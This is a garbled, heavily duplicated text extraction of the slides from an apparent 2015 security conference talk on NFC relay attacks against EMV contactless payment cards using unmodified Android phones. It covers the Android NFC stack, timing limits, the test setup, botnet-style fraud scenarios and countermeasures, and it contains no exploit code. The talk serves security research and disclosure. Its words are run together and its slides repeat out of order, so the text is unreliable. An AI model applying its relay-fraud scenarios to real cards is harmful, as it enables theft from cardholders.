NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
